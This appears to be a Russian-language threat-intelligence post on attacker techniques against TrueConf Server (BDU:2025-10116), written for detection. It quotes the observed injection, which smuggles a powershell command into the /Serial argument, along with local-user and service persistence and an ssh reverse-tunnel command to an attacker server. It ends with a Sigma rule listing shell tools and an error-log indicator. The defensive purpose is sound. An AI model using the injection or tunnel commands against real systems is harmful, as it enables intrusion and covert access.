Давайте познакомимся с TTP атакующих, которые получают доступ эксплуатируя уязвимость в TrueConf
🔤Успешная эксплуатация уязвимости позволяет выполнить инъекцию аргументов в командную строку процесса
C:\Program Files\TrueConf Server\httpconf\bin\tc_webmgr.exeИнъекция команды (успешная эксплуатация BDU:2025-10116, признак эксплуатации):
cmd.exe /s /c "“C:\Program Files\TrueConf Server\tc_server.exe” /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c "..."|| /File:"D:\TrueConf\activation\offlinereg.vrg""
🔤Атакующие закрепляются через создание локального пользователя (
audit, audit1) и создание сервиса C:\Windows\System32\dfxhost.dll с именем SscpSvc🔤Создают ssh-туннель. Подключение идет на 443 порт сервера атакующих, позволяет пройти межсетевой без функций NGFW
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 ...@...🔭 Обнаружение:
🔤 создание локальных пользователей
🔤 наличие подозрительных строк в аргументах
tc_webmgr.exe
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: "\cmd.exe"
selection_child:
Image|endswith: "\tc_server.exe"
CommandLine|contains:
- '||'
- '&&'
- 'powershell'
- 'pwsh'
- 'wscript'
- 'cscript'
- 'sh'
- 'bash'
- 'reg'
- 'regsvr32'
- 'bitsadmin'
- 'mshta'
- 'rundll32'
- 'curl'
condition: all of selection*
🔤
Журнал ошибок веб-сервера TrueConf также может содержать признаки эксплуатации (пример пути: C:\TrueConf\web_logs\error.*.log): error: the required argument for option '--Serial' is missing
Важно: указанная выше строка является однозначным признаком попытки эксплуатации уязвимости (инъекция команды через аргумент /Serial), однако возможно появление эксплоитов, где до инъекции указывается корректный ключ активации.
#detection@detectioneasy
#ttp@detectioneasy